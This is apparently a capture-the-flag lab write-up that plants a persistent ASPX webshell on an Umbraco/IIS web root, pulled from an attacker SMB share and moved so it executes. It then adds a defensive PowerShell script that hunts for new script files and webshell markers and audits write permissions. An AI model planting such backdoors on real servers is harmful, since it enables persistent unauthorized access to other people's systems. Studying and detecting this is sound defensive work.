Backdoor


The exploit script seemed quite unreliable as there had been multiple trials and errors prior to gaining a foothold. For that very reason, I will be installing a simple backdoor in case of connection loss.

ps c:\inetpub\wwwroot> dir
 
 
    directory: C:\inetpub\wwwroot
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   6:02 PM                App_Browsers                                                          
d-----        2/20/2020   1:59 AM                App_Data                                                              
d-----        2/19/2020  10:29 PM                App_Plugins                                                           
d-----        2/19/2020   3:12 PM                aspnet_client                                                         
d-----        2/19/2020  11:30 PM                bin                                                                   
d-----        2/19/2020   6:02 PM                Config                                                                
d-----        2/19/2020  10:29 PM                css                                                                   
d-----        2/20/2020   1:55 AM                Media                                                                 
d-----        2/19/2020  10:29 PM                scripts                                                               
d-----        2/19/2020   6:02 PM                Umbraco                                                               
d-----        2/19/2020   6:02 PM                Umbraco_Client                                                        
d-----        2/19/2020  10:29 PM                Views                                                                 
-a----        11/1/2018   1:06 PM            152 default.aspx                                                          
-a----        11/1/2018   1:06 PM             89 Global.asax                                                           
-a----        2/20/2020  12:57 AM          28539 Web.config         

This is the absolute path of the web root directory: c:\inetpub\wwwroot. It seems that the Umbraco CMS was installed to the default IIS directory.

ps c:\inetpub\wwwroot> echo hallo > test.txt

Making a simple test

Green light!

Payload


┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .

I am going to put a simple ASPX webshell that comes with Kali at the web root for ease of access.

Installation


ps c:\inetpub\wwwroot> copy \\10.10.14.5\smb\backdoor.aspx
ps c:\inetpub\wwwroot> dir
 
 
    directory: C:\inetpub\wwwroot
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   6:02 PM                App_Browsers                                                          
d-----        2/20/2020   1:59 AM                App_Data                                                              
d-----        2/19/2020  10:29 PM                App_Plugins                                                           
d-----        2/19/2020   3:12 PM                aspnet_client                                                         
d-----        2/19/2020  11:30 PM                bin                                                                   
d-----        2/19/2020   6:02 PM                Config                                                                
d-----        2/19/2020  10:29 PM                css                                                                   
d-----        2/20/2020   1:55 AM                Media                                                                 
d-----        2/19/2020  10:29 PM                scripts                                                               
d-----        2/19/2020   6:02 PM                Umbraco                                                               
d-----        2/19/2020   6:02 PM                Umbraco_Client                                                        
d-----        2/19/2020  10:29 PM                Views                                                                 
-a----         2/1/2023  10:20 AM            629 backdoor.aspx                                                         
-a----        11/1/2018   1:06 PM            152 default.aspx                                                          
-a----        11/1/2018   1:06 PM             89 Global.asax                                                           
-a----         2/1/2023  11:11 AM             16 test.txt                                                              
-a----        2/20/2020  12:57 AM          28539 Web.config                                                            

I placed the ASPX webshell in the c:\inetpub\wwwroot directory.

But it won't work, likely because the Web.config file does not include external files at the web root, let alone execute them.

ps c:\inetpub\wwwroot> move cmdasp.aspx Umbraco

I can just move it over to the c:\inetpub\wwwroot\Umbraco directory to piggyback on the Umbraco path already configured in the Web.config file.

And it works fine.
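
From the defender's side, the two listings above show what to look for: a script file whose timestamp is years newer than the rest of the site, in a web root that the web process was able to write to. The following hunt script is an added example, not part of the original write-up; `$WebRoot`, the `$Baseline` date, the extension list and the marker strings are assumptions to adapt to the site being checked.

```powershell
# Added example: find executable web content written after the last known
# deployment, and list who is allowed to create files in the web root.
# $Baseline is an assumption; take it from your own change records.
param(
    [string]  $WebRoot  = 'C:\inetpub\wwwroot',
    [datetime]$Baseline = '2020-02-21'
)

# Extensions that IIS/ASP.NET compiles or interprets on request (assumed list).
$scriptExt = '.aspx', '.ashx', '.asmx', '.asax', '.cshtml', '.config'
# Strings typical of command-execution webshells. Heuristic only: legitimate
# code can match, and an obfuscated shell will not.
$markers = 'System\.Diagnostics\.Process', 'ProcessStartInfo', 'cmd\.exe', 'powershell'

$findings = Get-ChildItem -Path $WebRoot -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $scriptExt -contains $_.Extension.ToLower() } |
    ForEach-Object {
        $hit   = Select-String -LiteralPath $_.FullName -Pattern $markers -List
        # Timestamps can be forged, so a marker hit is reported even on "old" files.
        $isNew = ($_.LastWriteTime -gt $Baseline) -or ($_.CreationTime -gt $Baseline)
        if ($isNew -or $hit) {
            [pscustomobject]@{
                Path    = $_.FullName
                Written = $_.LastWriteTime
                Created = $_.CreationTime
                IsNew   = $isNew
                Marker  = if ($hit) { $hit.Matches[0].Value } else { $null }
                SHA256  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            }
        }
    }
$findings | Sort-Object Written | Format-List

# Root cause: the test.txt write only succeeds if the account running the site
# can create files here. List every Allow ACE that grants file creation.
$write = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'
(Get-Acl -Path $WebRoot).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $write) -ne 0)
    } |
    Select-Object IdentityReference, FileSystemRights, IsInherited |
    Format-Table -AutoSize
```

Any application pool or service identity in the second table is a candidate for tightening: the site generally needs write access only to specific data and media folders, not to directories from which scripts are executed.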